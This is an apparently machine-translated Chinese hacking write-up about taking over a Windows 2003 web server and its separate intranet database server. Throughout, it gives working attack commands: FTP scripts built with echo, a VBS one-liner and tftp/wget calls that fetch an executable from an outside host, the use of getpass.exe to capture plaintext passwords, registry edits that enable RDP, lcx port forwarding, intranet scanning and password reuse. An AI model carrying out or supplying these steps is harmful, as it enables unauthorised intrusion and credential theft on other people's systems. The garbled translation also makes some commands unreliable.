Separate the station database and take the Intranet server to the target server.

0x00 permission escalation Environment
This is a machine of oil to ask me how to take off my pants ~~~
Then try Elevation of Privilege.
After reading the ports, 80 and 3389 are enabled.
Windows 2003x86

Now that you have your pants off, you can imagine that there must be a database.

As shown in the figure, this example shows that the station database is separated. At that time, I was dumbly holding the sa to execute the Add USER command.
The result cannot be connected ~~~ It cannot be connected !!!
Well, there are several ideas:
1. Regardless of the configuration file, the permission is directly raised on the original server.
2. Use sa to win the Intranet server and then take the original server
First try the first article ~~
 
0x01 Elevation of Privilege on the original server
There is no common third-party software, and it only starts from overflow.
The tragedy is that basically all overflow is like this, either being killed or not being executed.

Okay, I lost an lpk. dll file ~~~ Let's continue with the following ideas.
 
0x02 win the Intranet server first
 
There are also some ideas about using Intranet servers ~~~
First, you do not need to take down the server, directly read the hash, And Then decrypt it to see if all Intranet machines share the password ~~~
Second, use the lcx forwarding tool to win the server and then collect information on the server.
However, the above two ideas both require the upload of files to the database server.
How do I upload files to the server?
There are many ideas, so I will introduce three common methods.
First, use the cmd command to call ftp (or tftp) to upload a file (1433 principle of data transmission)
Second, use SQL statements to create a temporary table, write data, and export data
Third, vbs script upload
First, the first one (maybe the oil will ask why the file is written to the server without the echo command ~~~~ Echo can only begin a sentence and stops automatically when the> or> symbol is encountered, so do not use echo to write ~~)
 
First, build an ftp server on the local machine
The configuration is as follows:
Select the folder. The folder contains the uploaded file 1.txt.

Use cmd to write commands and execute one sentence.
Echo open 223.85.31.141> test.txt log on to the ftp server. 223.85.31.141 is the local ip address.
 
Echo test> test.txt write user name
 
Echo test> test.txt WRITE password
 
Echo bin> test.txt is equivalent to enter.
 
Echo get 1.txt>> test.txtdownload the 1.txt file in the ftpserver
 
Echo bye> test.txt disable the ftp server
 
Cmd execution is complete.
Then, use the typecommand to parse the file information in test.txt.
Type test.txt
Bytes ---------------------------------------------------------------------------------------------------------------
Open 223.85.31.141
Test
Test
Bin
Get 1.txt
Bye





Written successfully
The following code calls the ftp command to download and execute these commands ~~~~
 
The local test results are as follows:
Bytes ----------------------------------------------------------------------------------------------------------------------------
Ftp-s: test.txt
Ftp> open 223.85.31.141
Connect to 223.85.31.141.
220 Welcome to sus ftp Server
User (223.85.31.141 :( none )):
331 Password required for test
 
230 Logged on
Ftp> bin
200 set to I
Ftp> get 1.txt
200 Port command successful
150 Opening data channel for file transfer.
226 Transfer complete
Ftp: 11 bytes received, 0.00 KB/second in 11.00 seconds.
Ftp> bye
220 Bye
Bytes ---------------------------------------------------------------------------------------------------------------------
 
 
The tragedy is that the following command is executed on the server:
Bytes ---------------------------------------------------------------------------------------------------------------------
'Ftp 'is neither an internal or external command nor a running program
Or batch files.
Bytes ---------------------------------------------------------------------------------------------------------------------
The cause is that ftp.exe is deleted, or there is something about niub.
 
The second approach is to use SQL statements for writing and exporting ~~~
I was too lazy to write SQL statements for the stored procedure, so I wanted to find a script on the Internet to upload files.
 
Not to mention luck. I found a Sa-Upfile 1.0 (sa permission to upload files)
Environment: SQL2000, SA permission, which is commonly used for Elevation of Privilege extension.
Principle: Use textcopy to import and export binary data.
Okay. Try it.

It is really easy to use and decisive success ~~~~~
It seems that cainiao is really a cainiao. This is the legendary saupfile formation ~~~~
But the principle is to look at this article:
How to use SQL SERVER to remotely upload files
 
Here, we will also add vbs and tftp to download files ~~ One manager deletes ftp.exe.
The upload cannot be achieved.
VBSDownload files
However, the script is powerful here ~~~~
Script upload only supports ADODB. Stream, which is supported by windows by default.
The upload script is as follows (cmd also runs the following command ):
Echo Set xPost = CreateObject (^ "Microsoft. XMLHTTP ^ "): xPost. open ^ "GET ^", ^ "http://f4ck.yueyan.net/yueyan.exe^", 0: xPost. send (): Set sGet = CreateObject (^ "ADODB. stream ^ "): sGet. mode = 3: sGet. type = 1: sGet. open (): sGet. write (xPost. responseBody): sGet. saveToFile ^ "C: \ yueyan.exe ^", 2> down. vbs
 
Then run cscript down. vbs to complete the download.
 
TftpDownload:
Tftp download should be the easiest way to upload. Why do I mention it at the end? I do not recommend tftp upload.
Just introduce it to you.
The reason is that tftp is based on the udp protocol. Anyone who understands the udp and tc/IP protocols should know that the udp protocol is designed to transmit a small amount of data. QQ chat messages are based on this protocol. Therefore, only small files can be transferred. Of course, there is no pressure to transmit a wget file ~~~~ However, some anti-virus software sometimes blocks the transmission process ~~ Therefore, it is not recommended.
 
Let's talk about the usage method: first, the tftp Server

 
Then execute the command on the server. One is enough.
Tftp-I <your ip> get yueyan.exe path/yueyan.exe
For example, if you want to download yueyan.exe to the c root directory, run
Tftp-I 110.110.110.110 get yueyan.exe c:/yueyan.exe
This is simple. If the path is not added, the system 32 directory is used by default.
 
 
If more files are downloaded, we recommend that you upload wget.exe
The command is as follows:

Wgethttp://f4ck.yueyan.com/yueyan.exe

This makes it easier to upload other files.
 
First, use getpass.exe to directly capture the plaintext password.
Bytes ------------------------------------------------------------------------------------------------------------------------------
UserName: Administrator
LogonDomain: WIN-QUB8GLT3HKB
Password: 000
Slave --------------------------------------------------------------------------------------------------------------------------------
Do you want ~~~~ 000, so I tried it on the original server.

 
I cannot log on to the server. Okay, I admit that I have trampled on a dumb today ~~~
This is a good solution. Check whether 3389 is enabled on the server.
Use netstat-an to view the remote terminal:
REG query HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ WinStations \ RDP-Tcp/v PortNumber
Because of the system permission, you can directly enable the command
Enable 3389:
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server/v fDenyTSConnections/t REG_DWORD/d 0/f
 
After the forwarding is completed, it will be OK ~~
 
The local machine executes lcx-listen 51 33891.
The server executes lcx-slave 223.85.31.141 51 127.0.0.1 3389
Connect 127.0.0.1: 33891

 
Okay ~~~ Finally, go in ~~~
 
0x03 getting the original server from the Intranet
Take down a server and sacrifice my artifacts ~~~ H-scan
 

 
Sacrifice the second artifact ~~~ Sqltool
One-by-one Elevation of Privilege ~~~~
Crazy server acquisition ~~~~ Why does it take the server? Collect information ~~
Take a server and capture the password of a server ~~~~
Several passwords are obtained ~~~~
Then log on to the local machine.
Login successful
 


Actually, there is no actual reason to take this server, that is, to raise the right ~~~